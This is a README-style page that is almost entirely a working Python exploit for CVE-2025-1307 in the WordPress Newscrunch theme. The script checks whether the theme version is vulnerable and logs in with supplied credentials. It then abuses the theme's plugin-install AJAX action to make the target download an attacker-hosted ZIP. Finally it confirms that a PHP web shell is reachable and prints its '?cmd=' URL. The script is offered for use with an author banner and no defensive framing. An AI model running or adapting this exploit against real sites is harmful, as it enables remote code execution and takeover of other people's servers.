README.md
Rendering markdown...
import requests
import urllib3
import argparse
import time
import re
import zipfile
import io
from packaging import version
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BANNER = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@@@@ @@@@@@@@ @@@@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@!! @@@ @@! @@@@ @@!
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! !@! @!@ !@! @!@!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@ @!@!!@ @!@ @! !@! @!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !@! !!@!@! !@!!! !!! !!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!: !!:! !!! !!:
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!:
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: ::: :: :::: ::::::: :: ::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : : : : : : : : :
Exploit by | Nxploit , Khaled_alenazi
"""
def get_filename_from_zip(payload_url):
try:
response = requests.get(payload_url, verify=False, timeout=10)
zip_data = io.BytesIO(response.content)
with zipfile.ZipFile(zip_data, 'r') as zip_file:
file_list = zip_file.namelist()
php_files = [f for f in file_list if f.endswith(".php")]
if php_files:
return php_files[0] # Return the first PHP file found
else:
return None
except Exception as e:
print(f"[-] Error extracting filename from ZIP: {e}")
return None
def check_version(url):
try:
url_version = f"{url}/wp-content/themes/newscrunch/readme.txt"
response = requests.get(url_version, verify=False, timeout=10)
if response.status_code == 200:
match = re.search(r"Stable tag:\s*([\d.]+)", response.text)
if match:
theme_version = match.group(1)
print(f"[+] Newscrunch theme version detected: {theme_version}")
if version.parse(theme_version) <= version.parse("1.8.4"):
print("[+] Exploitation is possible, proceeding...")
return True
else:
print("[-] Target version is not vulnerable. Exiting.")
return False
else:
print("[-] Could not determine theme version. Proceeding anyway...")
return True
else:
print("[-] Failed to fetch theme version. Proceeding anyway...")
return True
except requests.RequestException as e:
print(f"[-] Error checking version: {e}")
return False
def login(url, username, password):
try:
session = requests.Session()
login_url = f"{url}/wp-login.php"
login_data = {'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log+In'}
print("[*] Logging in...")
response = session.post(login_url, verify=False, data=login_data, timeout=10)
time.sleep(2)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully.")
return session
else:
print("[-] Failed to log in. Check credentials.")
return None
except requests.RequestException as e:
print(f"[-] Error logging in: {e}")
return None
def upload_and_extract(session, url, payload_url):
try:
exploit_url = f"{url}/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin"
exploit_data = {'plugin_url': payload_url}
print("[*] Uploading and extracting payload...")
response = session.post(exploit_url, verify=False, data=exploit_data, timeout=15)
time.sleep(3)
if "success" in response.text.lower():
print("[+] Exploit executed successfully. Malicious file uploaded.")
return True
else:
print("[-] Exploit failed. Server response:")
print(response.text)
return False
except requests.RequestException as e:
print(f"[-] Error during upload and extraction: {e}")
return False
def exploit(url, username, password, payload_url):
if not check_version(url):
return
shell_file = get_filename_from_zip(payload_url)
if not shell_file:
print("[-] Could not determine the shell filename. Exiting.")
return
session = login(url, username, password)
if not session:
return
if upload_and_extract(session, url, payload_url):
shell_url = f"{url}/wp-content/plugins/{shell_file}"
print(f"[*] Checking if shell is accessible: {shell_url}")
time.sleep(2)
try:
shell_response = session.get(shell_url, verify=False, timeout=10)
if shell_response.status_code == 200:
print(f"[+] Shell successfully uploaded and accessible: {shell_url}?cmd=ls")
else:
print("[-] Shell upload failed or blocked. Check manually.")
except requests.RequestException as e:
print(f"[-] Error checking shell accessibility: {e}")
if __name__ == "__main__":
print(BANNER)
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi")
parser.add_argument('-u', '--url', required=True, help="Target WordPress URL (e.g., https://example.com)")
parser.add_argument('-un', '--username', required=True, help="WordPress username")
parser.add_argument('-p', '--password', required=True, help="WordPress password")
parser.add_argument('-pl', '--payload_url', required=True, help="Malicious file URL to upload")
args = parser.parse_args()
exploit(args.url, args.username, args.password, args.payload_url)